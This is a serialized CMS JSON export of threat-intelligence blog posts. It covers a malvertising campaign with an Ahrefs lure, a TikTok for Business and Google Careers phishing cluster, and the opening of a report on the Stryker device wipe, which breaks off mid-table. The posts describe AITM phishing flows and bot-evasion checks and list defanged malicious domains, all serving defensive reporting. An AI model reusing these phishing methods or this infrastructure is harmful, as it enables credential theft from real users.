surface.",[],{},{"nodeType":178,"data":14344,"content":14345},{},[14346,14349,14356,14359,14366],{"nodeType":173,"value":1451,"marks":14347,"data":14348},[],{},{"nodeType":186,"data":14350,"content":14351},{"uri":1456},[14352],{"nodeType":173,"value":1459,"marks":14353,"data":14355},[14354],{"type":194},{},{"nodeType":173,"value":1464,"marks":14357,"data":14358},[],{},{"nodeType":186,"data":14360,"content":14361},{"uri":1469},[14362],{"nodeType":173,"value":1472,"marks":14363,"data":14365},[14364],{"type":194},{},{"nodeType":173,"value":1477,"marks":14367,"data":14368},[],{},{"nodeType":231,"data":14370,"content":14371},{},[],{"nodeType":169,"data":14373,"content":14374},{},[14375],{"nodeType":173,"value":8406,"marks":14376,"data":14378},[14377],{"type":370},{},{"nodeType":178,"data":14380,"content":14381},{},[14382,14385,14392],{"nodeType":173,"value":8414,"marks":14383,"data":14384},[],{},{"nodeType":186,"data":14386,"content":14387},{"uri":8419},[14388],{"nodeType":173,"value":8422,"marks":14389,"data":14391},[14390],{"type":194},{},{"nodeType":173,"value":8427,"marks":14393,"data":14394},[],{},{"nodeType":178,"data":14396,"content":14397},{},[14398],{"nodeType":173,"value":14399,"marks":14400,"data":14401},"That said, the domains observed in this chain were:",[],{},{"nodeType":250,"data":14403,"content":14404},{},[14405,14415,14425,14435],{"nodeType":254,"data":14406,"content":14407},{},[14408],{"nodeType":178,"data":14409,"content":14410},{},[14411],{"nodeType":173,"value":14412,"marks":14413,"data":14414},"comandd-ok[.]com",[],{},{"nodeType":254,"data":14416,"content":14417},{},[14418],{"nodeType":178,"data":14419,"content":14420},{},[14421],{"nodeType":173,"value":14422,"marks":14423,"data":14424},"ahrefs-ac.squarespace[.]com",[],{},{"nodeType":254,"data":14426,"content":14427},{},[14428],{"nodeType":178,"data":14429,"content":14430},{},[14431],{"nodeType":173,"value":14432,"marks":14433,"data":14434},"ahrefs-seo-app.squarespace[.]com",[],{},{"nodeType":254,"data":14436,"content":14437},{},[14438],{"nodeType":178,"data":14439,"content":14440},{},[14441],{"nodeType":173,"value":14442,"marks":14443,"data":14444},"slgn-ahrefs-app-com.squarespace[.]com",[],{},{"nodeType":178,"data":14446,"content":14447},{},[14448],{"nodeType":173,"value":14449,"marks":14450,"data":14451},"[Update 24th February] We also observed the following new domains:",[],{},{"nodeType":250,"data":14453,"content":14454},{},[14455,14465,14475,14485],{"nodeType":254,"data":14456,"content":14457},{},[14458],{"nodeType":178,"data":14459,"content":14460},{},[14461],{"nodeType":173,"value":14462,"marks":14463,"data":14464},"www-ahrefs-seo-ads[.]surge.sh",[],{},{"nodeType":254,"data":14466,"content":14467},{},[14468],{"nodeType":178,"data":14469,"content":14470},{},[14471],{"nodeType":173,"value":14472,"marks":14473,"data":14474},"web-semrush-seo-wold[.]surge[.]sh",[],{},{"nodeType":254,"data":14476,"content":14477},{},[14478],{"nodeType":178,"data":14479,"content":14480},{},[14481],{"nodeType":173,"value":14482,"marks":14483,"data":14484},"contabelforeehc[.]com",[],{},{"nodeType":254,"data":14486,"content":14487},{},[14488],{"nodeType":178,"data":14489,"content":14490},{},[14491],{"nodeType":173,"value":14492,"marks":14493,"data":14494},"contabelfore[.]com",[],{},{"nodeType":178,"data":14496,"content":14497},{},[14498],{"nodeType":173,"value":14499,"marks":14500,"data":14501},"In addition, the following domains were previously associated with the attacks we detected in December:",[],{},{"nodeType":250,"data":14503,"content":14504},{},[14505,14515,14525,14535,14545,14555,14565],{"nodeType":254,"data":14506,"content":14507},{},[14508],{"nodeType":178,"data":14509,"content":14510},{},[14511],{"nodeType":173,"value":14512,"marks":14513,"data":14514},"ads-adsword1.odoo[.]com",[],{},{"nodeType":254,"data":14516,"content":14517},{},[14518],{"nodeType":178,"data":14519,"content":14520},{},[14521],{"nodeType":173,"value":14522,"marks":14523,"data":14524},"sing-operador2[.]click/accounts/v3/login",[],{},{"nodeType":254,"data":14526,"content":14527},{},[14528],{"nodeType":178,"data":14529,"content":14530},{},[14531],{"nodeType":173,"value":14532,"marks":14533,"data":14534},"adsgooglie.odoo[.]com/",[],{},{"nodeType":254,"data":14536,"content":14537},{},[14538],{"nodeType":178,"data":14539,"content":14540},{},[14541],{"nodeType":173,"value":14542,"marks":14543,"data":14544},"word4only[.]online/",[],{},{"nodeType":254,"data":14546,"content":14547},{},[14548],{"nodeType":178,"data":14549,"content":14550},{},[14551],{"nodeType":173,"value":14552,"marks":14553,"data":14554},"adsloginacess.kartra[.]com/page/oeN7",[],{},{"nodeType":254,"data":14556,"content":14557},{},[14558],{"nodeType":178,"data":14559,"content":14560},{},[14561],{"nodeType":173,"value":14562,"marks":14563,"data":14564},"ads-o.odoo[.]com",[],{},{"nodeType":254,"data":14566,"content":14567},{},[14568],{"nodeType":178,"data":14569,"content":14570},{},[14571],{"nodeType":173,"value":14572,"marks":14573,"data":14574},"operador8-ads[.]lat/accounts/v3/login/",[],{},{"nodeType":178,"data":14576,"content":14577},{},[14578],{"nodeType":173,"value":14579,"marks":14580,"data":14582},"Push customers do not need to take any further action.",[14581],{"type":370},{},"New samples linked to a Push-tracked malvertising campaign detected, targeting Google accounts via an Ahrefs lure. ","2026-01-12T00:00:00.000Z",{"items":14586},[14587,14589],{"sys":14588,"name":509},{"id":508},{"sys":14590,"name":505},{"id":504},{"items":14592},[14593],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":14594},{"url":1496},{"items":14596},[14597],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":14598},{"url":1496},{"json":14600,"links":15176},{"nodeType":165,"data":14601,"content":14602},{},[14603,14610,14630,14636,14639,14647,14654,14661,14668,14691,14698,14717,14724,14730,14738,14745,14751,14757,14763,14769,14775,14781,14787,14790,14798,14805,14812,14832,14878,14885,14927,14933,14936,14943,14959,14966,15078,15085,15098,15105,15108,15116,15122,15128,15164,15170],{"nodeType":178,"data":14604,"content":14605},{},[14606],{"nodeType":173,"value":14607,"marks":14608,"data":14609},"We recently detected and blocked a new style of phishing page targeting TikTok for Business accounts — used by company marketing teams to manage ad campaigns. ",[],{},{"nodeType":178,"data":14611,"content":14612},{},[14613,14617,14626],{"nodeType":173,"value":14614,"marks":14615,"data":14616},"On closer analysis, we identified a cluster of linked pages featuring both TikTok themes, and Google themed “Schedule a Call” imitation pages, ",[],{},{"nodeType":186,"data":14618,"content":14620},{"uri":14619},"https://sublime.security/blog/google-careers-impersonation-credential-phishing-scam-with-endless-variation/",[14621],{"nodeType":173,"value":14622,"marks":14623,"data":14625},"similar to a campaign reported late last year",[14624],{"type":194},{},{"nodeType":173,"value":14627,"marks":14628,"data":14629},", suggesting a continuity of this previous campaign.",[],{},{"nodeType":312,"data":14631,"content":14635},{"target":14632},{"sys":14633},{"id":14634,"type":317,"linkType":318},"6mR622LOKuhGRfBXkIsUrx",[],{"nodeType":231,"data":14637,"content":14638},{},[],{"nodeType":169,"data":14640,"content":14641},{},[14642],{"nodeType":173,"value":14643,"marks":14644,"data":14646},"Campaign breakdown",[14645],{"type":370},{},{"nodeType":178,"data":14648,"content":14649},{},[14650],{"nodeType":173,"value":14651,"marks":14652,"data":14653},"Push researchers have identified a cluster of newly registered phishing pages all registered on the 24th March within a 9-second window. All of the pages are hosted behind Cloudflare with the same registrar (Nicenic International Group, commonly abused for bulk phishing domain registration). ",[],{},{"nodeType":178,"data":14655,"content":14656},{},[14657],{"nodeType":173,"value":14658,"marks":14659,"data":14660},"The pages feature a common naming convention, being various derivations of welcome.careers*[.]com. A full list of identified domains is provided later, but we expect this to grow significantly as the campaign ramps up. ",[],{},{"nodeType":178,"data":14662,"content":14663},{},[14664],{"nodeType":173,"value":14665,"marks":14666,"data":14667},"Victims are tricked into clicking a malicious link that takes them to one of two page styles. ",[],{},{"nodeType":250,"data":14669,"content":14670},{},[14671,14681],{"nodeType":254,"data":14672,"content":14673},{},[14674],{"nodeType":178,"data":14675,"content":14676},{},[14677],{"nodeType":173,"value":14678,"marks":14679,"data":14680},"A TikTok for Business cloned page ",[],{},{"nodeType":254,"data":14682,"content":14683},{},[14684],{"nodeType":178,"data":14685,"content":14686},{},[14687],{"nodeType":173,"value":14688,"marks":14689,"data":14690},"A Google careers “Schedule a call” cloned page",[],{},{"nodeType":178,"data":14692,"content":14693},{},[14694],{"nodeType":173,"value":14695,"marks":14696,"data":14697},"In both cases, the victim is required to complete a basic information form before being served with a malicious login page that is in fact fronting a reverse proxy AITM phishing kit. ",[],{},{"nodeType":178,"data":14699,"content":14700},{},[14701,14705,14713],{"nodeType":173,"value":14702,"marks":14703,"data":14704},"While Push has limited visibility of the initial delivery mechanism in this case, we can assume that a similar method of dynamically generated email is being used to the ",[],{},{"nodeType":186,"data":14706,"content":14707},{"uri":14619},[14708],{"nodeType":173,"value":14709,"marks":14710,"data":14712},"previously identified campaign",[14711],{"type":194},{},{"nodeType":173,"value":14714,"marks":14715,"data":14716}," reported by Sublime in October, featuring a similar Google Careers cloned page. ",[],{},{"nodeType":178,"data":14718,"content":14719},{},[14720],{"nodeType":173,"value":14721,"marks":14722,"data":14723},"You can see an example of the page load below. ",[],{},{"nodeType":312,"data":14725,"content":14729},{"target":14726},{"sys":14727},{"id":14728,"type":317,"linkType":318},"3wjGpMs3qJsZaar2LIlQbE",[],{"nodeType":235,"data":14731,"content":14732},{},[14733],{"nodeType":173,"value":14734,"marks":14735,"data":14737},"Attack flow",[14736],{"type":370},{},{"nodeType":178,"data":14739,"content":14740},{},[14741],{"nodeType":173,"value":14742,"marks":14743,"data":14744},"When the link is first clicked, the page is silently redirected from a legitimate Google Storage site before loading the page. A Cloudflare Turnstile check is used to prevent security bots from analyzing the page, before loading either a TikTok or Google themed page. Progressing through the forms ultimately serves up an AITM phishing page.",[],{},{"nodeType":312,"data":14746,"content":14750},{"target":14747},{"sys":14748},{"id":14749,"type":317,"linkType":318},"5zoUeGW0zlC7u9vtHolskM",[],{"nodeType":312,"data":14752,"content":14756},{"target":14753},{"sys":14754},{"id":14755,"type":317,"linkType":318},"7eyc9v7xVZzXK8jY53I9li",[],{"nodeType":312,"data":14758,"content":14762},{"target":14759},{"sys":14760},{"id":14761,"type":317,"linkType":318},"37kj78jit44Mp6LCi7tEsC",[],{"nodeType":312,"data":14764,"content":14768},{"target":14765},{"sys":14766},{"id":14767,"type":317,"linkType":318},"4qaPOlBYeIfEoG2OZvl8lI",[],{"nodeType":312,"data":14770,"content":14774},{"target":14771},{"sys":14772},{"id":14773,"type":317,"linkType":318},"7cIFMDwHF2R8vswtJzWdKn",[],{"nodeType":312,"data":14776,"content":14780},{"target":14777},{"sys":14778},{"id":14779,"type":317,"linkType":318},"5YtrhvypdLkcSUoj2IEj24",[],{"nodeType":312,"data":14782,"content":14786},{"target":14783},{"sys":14784},{"id":14785,"type":317,"linkType":318},"7cc4UclvVVW3YuUVB8PpJp",[],{"nodeType":231,"data":14788,"content":14789},{},[],{"nodeType":169,"data":14791,"content":14792},{},[14793],{"nodeType":173,"value":14794,"marks":14795,"data":14797},"Why TikTok???",[14796],{"type":370},{},{"nodeType":178,"data":14799,"content":14800},{},[14801],{"nodeType":173,"value":14802,"marks":14803,"data":14804},"Given that the majority of phishing pages intercepted by Push tend to replicate core SSO platforms like Google and Microsoft, targeting TikTok is a notable development, though not entirely uncommon. ",[],{},{"nodeType":178,"data":14806,"content":14807},{},[14808],{"nodeType":173,"value":14809,"marks":14810,"data":14811},"TikTok seems a weird choice at first glance. But it makes more sense when we consider that TikTok has been historically abused to distribute malicious links and social engineering instructions. ",[],{},{"nodeType":178,"data":14813,"content":14814},{},[14815,14819,14828],{"nodeType":173,"value":14816,"marks":14817,"data":14818},"This includes multiple infostealers like Vidar, StealC, and Aura Stealer delivered via ClickFix-style instructions with AI-generated videos posed as activation guides for Windows, Spotify, and CapCut. They instructed viewers to open PowerShell and paste commands that downloaded infostealers from bulletproof hosting infrastructure. ",[],{},{"nodeType":186,"data":14820,"content":14822},{"uri":14821},"https://thehackernews.com/2025/05/hackers-use-tiktok-videos-to-distribute.html",[14823],{"nodeType":173,"value":14824,"marks":14825,"data":14827},"One video alone",[14826],{"type":194},{},{"nodeType":173,"value":14829,"marks":14830,"data":14831}," hit ~500,000 views and 20,000+ likes.",[],{},{"nodeType":178,"data":14833,"content":14834},{},[14835,14839,14848,14852,14861,14865,14874],{"nodeType":173,"value":14836,"marks":14837,"data":14838},"It’s also a common hunting ground for crypto scammers, like many other social platforms have historically been abused (most commonly Twitter/X). Many of these are done with the full knowledge and consent of “influencers”, but there are also overtly malicious examples such as ",[],{},{"nodeType":186,"data":14840,"content":14842},{"uri":14841},"https://www.bitdefender.com/en-us/blog/hotforsecurity/fake-elon-musk-crypto-giveaway-scam-campaigns-run-rampant-on-tiktok",[14843],{"nodeType":173,"value":14844,"marks":14845,"data":14847},"deepfaked videos of Elon Musk",[14846],{"type":194},{},{"nodeType":173,"value":14849,"marks":14850,"data":14851}," with overlaid AI-generated audio promoting fake exchanges. ",[],{},{"nodeType":186,"data":14853,"content":14855},{"uri":14854},"https://www.malwarebytes.com/blog/news/2025/10/tiktok-scam-sells-you-access-to-your-own-fake-money",[14856],{"nodeType":173,"value":14857,"marks":14858,"data":14860},"TikTok DMs",[14859],{"type":194},{},{"nodeType":173,"value":14862,"marks":14863,"data":14864},", like ",[],{},{"nodeType":186,"data":14866,"content":14868},{"uri":14867},"https://pushsecurity.com/blog/new-phishing-campaign-identified-targeting-linkedin-users/",[14869],{"nodeType":173,"value":14870,"marks":14871,"data":14873},"other social media apps",[14872],{"type":194},{},{"nodeType":173,"value":14875,"marks":14876,"data":14877},", are also a place where attackers can target victims. ",[],{},{"nodeType":178,"data":14879,"content":14880},{},[14881],{"nodeType":173,"value":14882,"marks":14883,"data":14884},"Ultimately, it’s easy to see how access to verified and trustworthy business accounts on TikTok could be abused in the wrong hands. ",[],{},{"nodeType":178,"data":14886,"content":14887},{},[14888,14892,14900,14904,14912,14916,14924],{"nodeType":173,"value":14889,"marks":14890,"data":14891},"It’s worth pointing out too that many/most business users will opt to “log in with Google.” This means that anyone using Google to login to their TikTok account will effectively have both accounts used to distribute ads compromised in one go, opening up the typical ",[],{},{"nodeType":186,"data":14893,"content":14894},{"uri":13156},[14895],{"nodeType":173,"value":14896,"marks":14897,"data":14899},"Google Ad Manager exploitation playbook",[14898],{"type":194},{},{"nodeType":173,"value":14901,"marks":14902,"data":14903}," — as well as accessing any further apps accessible via SSO for data theft and extortion. This has become the standard MO for attackers, in campaigns such as the ",[],{},{"nodeType":186,"data":14905,"content":14906},{"uri":950},[14907],{"nodeType":173,"value":14908,"marks":14909,"data":14911},"Scattered Lapsus$ Hunters AITM phishing",[14910],{"type":194},{},{"nodeType":173,"value":14913,"marks":14914,"data":14915}," spree earlier this year, and their ",[],{},{"nodeType":186,"data":14917,"content":14918},{"uri":9526},[14919],{"nodeType":173,"value":14920,"marks":14921,"data":14923},"recent spate of device code phishing attacks",[14922],{"type":194},{},{"nodeType":173,"value":1477,"marks":14925,"data":14926},[],{},{"nodeType":312,"data":14928,"content":14932},{"target":14929},{"sys":14930},{"id":14931,"type":317,"linkType":318},"4H3AzW7q4QBv7pJawSqQBJ",[],{"nodeType":231,"data":14934,"content":14935},{},[],{"nodeType":169,"data":14937,"content":14938},{},[14939],{"nodeType":173,"value":8406,"marks":14940,"data":14942},[14941],{"type":370},{},{"nodeType":178,"data":14944,"content":14945},{},[14946,14949,14956],{"nodeType":173,"value":8414,"marks":14947,"data":14948},[],{},{"nodeType":186,"data":14950,"content":14951},{"uri":8419},[14952],{"nodeType":173,"value":8422,"marks":14953,"data":14955},[14954],{"type":194},{},{"nodeType":173,"value":8427,"marks":14957,"data":14958},[],{},{"nodeType":178,"data":14960,"content":14961},{},[14962],{"nodeType":173,"value":14963,"marks":14964,"data":14965},"That said, the domains observed in the initial cluster were:",[],{},{"nodeType":250,"data":14967,"content":14968},{},[14969,14979,14989,14999,15009,15019,15029,15039,15049,15059,15069],{"nodeType":254,"data":14970,"content":14971},{},[14972],{"nodeType":178,"data":14973,"content":14974},{},[14975],{"nodeType":173,"value":14976,"marks":14977,"data":14978},"welcome.careerscrews[.]com",[],{},{"nodeType":254,"data":14980,"content":14981},{},[14982],{"nodeType":178,"data":14983,"content":14984},{},[14985],{"nodeType":173,"value":14986,"marks":14987,"data":14988},"welcome.careerstaffer[.]com",[],{},{"nodeType":254,"data":14990,"content":14991},{},[14992],{"nodeType":178,"data":14993,"content":14994},{},[14995],{"nodeType":173,"value":14996,"marks":14997,"data":14998},"welcome.careersworkflow[.]com",[],{},{"nodeType":254,"data":15000,"content":15001},{},[15002],{"nodeType":178,"data":15003,"content":15004},{},[15005],{"nodeType":173,"value":15006,"marks":15007,"data":15008},"welcome.careerstransform[.]com",[],{},{"nodeType":254,"data":15010,"content":15011},{},[15012],{"nodeType":178,"data":15013,"content":15014},{},[15015],{"nodeType":173,"value":15016,"marks":15017,"data":15018},"welcome.careersupskill[.]com",[],{},{"nodeType":254,"data":15020,"content":15021},{},[15022],{"nodeType":178,"data":15023,"content":15024},{},[15025],{"nodeType":173,"value":15026,"marks":15027,"data":15028},"welcome.careerssuccess[.]com",[],{},{"nodeType":254,"data":15030,"content":15031},{},[15032],{"nodeType":178,"data":15033,"content":15034},{},[15035],{"nodeType":173,"value":15036,"marks":15037,"data":15038},"welcome.careersstaffgrid[.]com",[],{},{"nodeType":254,"data":15040,"content":15041},{},[15042],{"nodeType":178,"data":15043,"content":15044},{},[15045],{"nodeType":173,"value":15046,"marks":15047,"data":15048},"welcome.careersprogress[.]com",[],{},{"nodeType":254,"data":15050,"content":15051},{},[15052],{"nodeType":178,"data":15053,"content":15054},{},[15055],{"nodeType":173,"value":15056,"marks":15057,"data":15058},"welcome.careersgrower[.]com",[],{},{"nodeType":254,"data":15060,"content":15061},{},[15062],{"nodeType":178,"data":15063,"content":15064},{},[15065],{"nodeType":173,"value":15066,"marks":15067,"data":15068},"welcome.careersengage[.]com",[],{},{"nodeType":254,"data":15070,"content":15071},{},[15072],{"nodeType":178,"data":15073,"content":15074},{},[15075],{"nodeType":173,"value":14976,"marks":15076,"data":15077},[],{},{"nodeType":178,"data":15079,"content":15080},{},[15081],{"nodeType":173,"value":15082,"marks":15083,"data":15084},"Since the pages are all hosted in a single Google Storage bucket, any linked pages/files should be considered to be malicious.",[],{},{"nodeType":250,"data":15086,"content":15087},{},[15088],{"nodeType":254,"data":15089,"content":15090},{},[15091],{"nodeType":178,"data":15092,"content":15093},{},[15094],{"nodeType":173,"value":15095,"marks":15096,"data":15097},"storage.googleapis[.]com/fiz2a4s014vt8q4l5i0m1m7b0gl/",[],{},{"nodeType":178,"data":15099,"content":15100},{},[15101],{"nodeType":173,"value":14579,"marks":15102,"data":15104},[15103],{"type":370},{},{"nodeType":231,"data":15106,"content":15107},{},[],{"nodeType":169,"data":15109,"content":15110},{},[15111],{"nodeType":173,"value":15112,"marks":15113,"data":15115},"About Push Security",[15114],{"type":370},{},{"nodeType":178,"data":15117,"content":15118},{},[15119],{"nodeType":173,"value":13453,"marks":15120,"data":15121},[],{},{"nodeType":178,"data":15123,"content":15124},{},[15125],{"nodeType":173,"value":5264,"marks":15126,"data":15127},[],{},{"nodeType":178,"data":15129,"content":15130},{},[15131,15134,15141,15144,15151,15154,15161],{"nodeType":173,"value":1451,"marks":15132,"data":15133},[],{},{"nodeType":186,"data":15135,"content":15136},{"uri":1456},[15137],{"nodeType":173,"value":1459,"marks":15138,"data":15140},[15139],{"type":194},{},{"nodeType":173,"value":2936,"marks":15142,"data":15143},[],{},{"nodeType":186,"data":15145,"content":15146},{"uri":3941},[15147],{"nodeType":173,"value":5287,"marks":15148,"data":15150},[15149],{"type":194},{},{"nodeType":173,"value":3949,"marks":15152,"data":15153},[],{},{"nodeType":186,"data":15155,"content":15156},{"uri":1469},[15157],{"nodeType":173,"value":1472,"marks":15158,"data":15160},[15159],{"type":194},{},{"nodeType":173,"value":1477,"marks":15162,"data":15163},[],{},{"nodeType":312,"data":15165,"content":15169},{"target":15166},{"sys":15167},{"id":15168,"type":317,"linkType":318},"7ccfmP2yXXmtC1R5BLmKYg",[],{"nodeType":178,"data":15171,"content":15172},{},[15173],{"nodeType":173,"value":37,"marks":15174,"data":15175},[],{},{"entries":15177},{"hyperlink":15178,"inline":15179,"block":15180},[],[],[15181,15220,15225,15232,15238,15244,15250,15256,15262,15267,15274],{"sys":15182,"__typename":5311,"content":15183,"name":15219,"title":118},{"id":14634},{"json":15184},{"data":15185,"content":15186,"nodeType":165},{},[15187],{"data":15188,"content":15189,"nodeType":178},{},[15190,15194,15203,15207,15215],{"data":15191,"marks":15192,"value":15193,"nodeType":173},{},[],"We’ve ",{"data":15195,"content":15197,"nodeType":186},{"uri":15196},"https://pushsecurity.com/blog/google-search-malvertising-campaign-continues-now-impersonating-ahrefs/",[15198],{"data":15199,"marks":15200,"value":15202,"nodeType":173},{},[15201],{"type":194},"reported extensively",{"data":15204,"marks":15205,"value":15206,"nodeType":173},{},[]," about malvertising scams in the past — particularly targeting Google Ad Manager accounts. Attackers take over Ad Manager accounts and use them to deploy even more malicious ads, harvesting account credentials via AITM phishing pages and ClickFix-style malware delivery (dropping infostealers and remote access tools). They also run ",{"data":15208,"content":15209,"nodeType":186},{"uri":13156},[15210],{"data":15211,"marks":15212,"value":15214,"nodeType":173},{},[15213],{"type":194},"ad fraud campaigns",{"data":15216,"marks":15217,"value":15218,"nodeType":173},{},[]," siphoning company ad budgets into their own pockets. ","Tiktok phishing insight box 1",{"sys":15221,"__typename":5434,"title":15222,"arcadeDemoUrl":15223,"playText":15224},{"id":14728},"Tiktok phishing demo","https://demo.arcade.software/i0NCDltufFhv8xouaTxr?embed","30 secs",{"sys":15226,"__typename":5345,"title":15227,"caption":15227,"layoutMode":118,"file":15228},{"id":14749},"Push example detection timeline showing the initial redirect. In this example Push was configured to Monitor only mode, rather than Block mode.",{"url":15229,"width":15230,"height":15231},"https://images.ctfassets.net/y1cdw1ablpvd/5WAwawK6I0Ez56HE9icvO4/6ad8fedf0c6b72b29b1664ea854593be/image8.png",1802,954,{"sys":15233,"__typename":5345,"title":15234,"caption":15234,"layoutMode":118,"file":15235},{"id":14755},"Initial Cloudflare Turnstile bot check to block security bots from analyzing the page.",{"url":15236,"width":5358,"height":15237},"https://images.ctfassets.net/y1cdw1ablpvd/28rZywTFT0ro4dhWPCfwAJ/6a8342f9bb785db5ed8677939921645d/image6.png",1131,{"sys":15239,"__typename":5345,"title":15240,"caption":15240,"layoutMode":118,"file":15241},{"id":14761},"TikTok for Business themed page.",{"url":15242,"width":5358,"height":15243},"https://images.ctfassets.net/y1cdw1ablpvd/7uoSoE5xwXEBA3tCIOReTX/3e8b06e18097f8625f3edaa92ba770d1/image2.png",1142,{"sys":15245,"__typename":5345,"title":15246,"caption":15246,"layoutMode":118,"file":15247},{"id":14767},"Google Careers themed landing page.",{"url":15248,"width":5358,"height":15249},"https://images.ctfassets.net/y1cdw1ablpvd/5NQmzcYtnsqONZFMljk1Z8/354a8721f4c2195c1aa88b3258a073f1/image1.png",1213,{"sys":15251,"__typename":5345,"title":15252,"caption":15252,"layoutMode":118,"file":15253},{"id":14773},"TikTok for Business themed login page.  The fake page has replaced the “Log in with TikTok” button with “Log in with Google”. ",{"url":15254,"width":5358,"height":15255},"https://images.ctfassets.net/y1cdw1ablpvd/5rDbxr6ZkcbGv2f6opf6TE/c6997fa3fe50426dae17c6578e2c04f1/image4.png",1191,{"sys":15257,"__typename":5345,"title":15258,"caption":15258,"layoutMode":118,"file":15259},{"id":14779},"The TikTok login page has input validation that requires a business email address.",{"url":15260,"width":5358,"height":15261},"https://images.ctfassets.net/y1cdw1ablpvd/1ba6sQzfR3hjeQHyx8zjae/f588da1242c68ea03ee149d489ee272e/image7.png",1127,{"sys":15263,"__typename":5345,"title":15264,"caption":15264,"layoutMode":118,"file":15265},{"id":14785},"Cloned Google login page hosting an AITM phishing kit.",{"url":15266,"width":5358,"height":15243},"https://images.ctfassets.net/y1cdw1ablpvd/6aGrOKJBuwAPalVYgx4P9u/41a456ba585767c6af8637bab392cabf/image5.png",{"sys":15268,"__typename":15269,"type":15270,"ctaText":15271,"buttonLabel":15272,"buttonColour":15273,"buttonUrl":66},{"id":14931},"CtaWidget","Custom","Learn about the browser attack techniques security teams must contend with in 2026","Get the Report","sunny orange",{"sys":15275,"__typename":15269,"type":15270,"ctaText":15276,"buttonLabel":15277,"buttonColour":15273,"buttonUrl":45},{"id":15168},"Get ahead of the latest browser attacks with our new webinar series, featuring guest experts John Hammond, Troy Hunt, Matt Johansen, and more!","Register Now","content:blog:tiktok-phishing.json","blog/tiktok-phishing.json","blog/tiktok-phishing",{"_path":15282,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":15283,"ogImage":118,"summary":15286,"title":15297,"subtitle":118,"metaTitle":15298,"synopsis":15299,"hashTags":118,"publishedDate":15300,"slug":15301,"tagsCollection":15302,"content":15308,"relatedBlogPostsCollection":16253,"authorsCollection":18366,"_id":18370,"_type":5439,"_source":5440,"_file":18371,"_stem":18372,"_extension":5439},"/blog/stryker-handala-report",{"id":15284,"publishedAt":15285},"10hUzI9iiY8fFtmlA0M9Ne","2026-03-25T11:55:19.329Z",{"json":15287},{"data":15288,"content":15289,"nodeType":165},{},[15290],{"data":15291,"content":15292,"nodeType":178},{},[15293],{"data":15294,"marks":15295,"value":15296,"nodeType":173},{},[],"The Stryker breach doesn't track with Handala's historical TTPs. This shows just how quickly the default attacker toolkit is evolving, and is a wake-up call for defenders.","The Stryker breach didn't match the playbook. That shouldn't be a surprise.","Analyzing Iran-nexus TTP evolution in 2026","Analysing the Stryker breach in line with recent changes to the Iran-nexus cyber playbook.","2026-03-19T00:00:00.000Z","stryker-handala-report",{"items":15303},[15304,15306],{"sys":15305,"name":505},{"id":504},{"sys":15307,"name":509},{"id":508},{"json":15309,"links":16214},{"nodeType":165,"data":15310,"content":15311},{},[15312,15319,15325,15344,15347,15355,15362,15369,15372,15380,15387,15562,15569,15576,15579,15587,15594,15601,15608,15615,15618,15626,15645,15652,15660,15667,15812,15831,15839,15846,15981,16000,16006,16009,16017,16024,16031,16038,16041,16049,16089,16120,16127,16132,16135,16143,16150,16157,16164,16167,16174,16181],{"nodeType":178,"data":15313,"content":15314},{},[15315],{"nodeType":173,"value":15316,"marks":15317,"data":15318},"On the morning of March 11, employees at Stryker Corporation offices across 79 countries turned on their laptops and found them wiped and unusable. Personal phones enrolled in the company's BYOD programme had been factory reset overnight, taking photos, banking apps, and authenticator tokens with them. Login pages had also been defaced with the logo of Handala, a persona operated by Iran's Ministry of Intelligence and Security (MOIS).",[],{},{"nodeType":312,"data":15320,"content":15324},{"target":15321},{"sys":15322},{"id":15323,"type":317,"linkType":318},"6JtlGFq0RDoW9g6zyAcPvn",[],{"nodeType":178,"data":15326,"content":15327},{},[15328,15332,15340],{"nodeType":173,"value":15329,"marks":15330,"data":15331},"In a break from the standard Handala playbook, there was no ransomware, no malware, and no exploit chain. The attacker ",[],{},{"nodeType":186,"data":15333,"content":15335},{"uri":15334},"https://www.bleepingcomputer.com/news/security/stryker-attack-wiped-tens-of-thousands-of-devices-no-malware-needed/",[15336],{"nodeType":173,"value":15337,"marks":15338,"data":15339},"simply logged into Microsoft Intune",[],{},{"nodeType":173,"value":15341,"marks":15342,"data":15343}," with compromised Global Administrator credentials, abused a legitimate feature, and wiped over 80,000 systems, servers, and mobile devices.",[],{},{"nodeType":231,"data":15345,"content":15346},{},[],{"nodeType":169,"data":15348,"content":15349},{},[15350],{"nodeType":173,"value":15351,"marks":15352,"data":15354},"What a Handala attack was supposed to look like",[15353],{"type":370},{},{"nodeType":178,"data":15356,"content":15357},{},[15358],{"nodeType":173,"value":15359,"marks":15360,"data":15361},"Handala has a reputation for being a manual, hands-on intrusion team whose TTPs have typically included VPN credential brute-force for initial access (hundreds of logon attempts from commercial VPN nodes), supply chain compromise via managed service providers, RDP as the primary lateral movement method, ADRecon for Active Directory enumeration, LSASS credential dumping via comsvcs.dll, and GPO logon scripts for wiper distribution.",[],{},{"nodeType":178,"data":15363,"content":15364},{},[15365],{"nodeType":173,"value":15366,"marks":15367,"data":15368},"If you had invested in detection logic around Handala's documented toolkit (BiBi Wiper file extensions, Cl Wiper's EldoS RawDisk driver calls, No-Justice partition table manipulation, Karma Shell's Base64-with-XOR web shell patterns) none of it would have fired. Wiper malware signatures, web shell indicators, RawDisk driver loading, MBR/GPT manipulation, SharePoint exploitation patterns, anomalous RDP/SMB lateral movement: all reasonable detection priorities given the group's threat intelligence profile, but all irrelevant when it mattered most.",[],{},{"nodeType":231,"data":15370,"content":15371},{},[],{"nodeType":169,"data":15373,"content":15374},{},[15375],{"nodeType":173,"value":15376,"marks":15377,"data":15379},"What Handala actually did",[15378],{"type":370},{},{"nodeType":178,"data":15381,"content":15382},{},[15383],{"nodeType":173,"value":15384,"marks":15385,"data":15386},"The Stryker attack departs from the documented baseline across the kill chain.",[],{},{"nodeType":1653,"data":15388,"content":15389},{},[15390,15426,15463,15496,15529],{"nodeType":1657,"data":15391,"content":15392},{},[15393,15404,15415],{"nodeType":1661,"data":15394,"content":15395},{},[15396],{"nodeType":178,"data":15397,"content":15398},{},[15399],{"nodeType":173,"value":15400,"marks":15401,"data":15403},"Kill chain phase",[15402],{"type":370},{},{"nodeType":1661,"data":15405,"content":15406},{},[15407],{"nodeType":178,"data":15408,"content":15409},{},[15410],{"nodeType":173,"value":15411,"marks":15412,"data":15414},"Historical TTP",[15413],{"type":370},{},{"nodeType":1661,"data":15416,"content":15417},{},[15418],{"nodeType":178,"data":15419,"content":15420},{},[15421],{"nodeType":173,"value":15422,"marks":15423,"data":15425},"Stryker 